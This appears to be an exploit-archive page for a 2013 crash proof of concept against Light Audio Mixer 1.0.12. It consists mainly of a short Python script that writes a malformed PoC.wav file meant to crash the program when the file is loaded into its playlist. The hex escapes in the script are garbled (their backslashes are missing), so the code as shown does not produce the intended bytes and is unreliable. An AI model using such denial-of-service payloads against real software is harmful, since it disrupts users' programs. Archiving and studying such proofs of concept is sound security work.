[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Light Audio Mixer Version 1.0.12 (.wav) - Crash POC
# Published : 2013-07-16
# Author :
# Previous Title : Galil-RIO Modbus - Denial of Service
# Next Title : Samsung PS50C7700 TV - Denial of Service


# Exploit Title: Light Audio Mixer Version 1.0.12 (.wav) - Crash POC
# Date: 14-07-2013
# Exploit Author: ariarat
# Software Link: http://download.cnet.com/Light-Audio-Mixer/3000-2139_4-10791607.html
# Version: 1.0.12
# Tested on: [ Windows XP sp3]
#============================================================================================
# After creating PoC file.(.wav),drag it to Play List and choose a Deck(if present) and press OK!
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : mehdi.esmaeelpour@gmail.com
#============================================================================================

#!/usr/bin/python

string=("x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01"
"x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E"
"x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22"
"x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00")

filename = "PoC.wav"
file = open(filename , "w")
file.write(string)
file.close()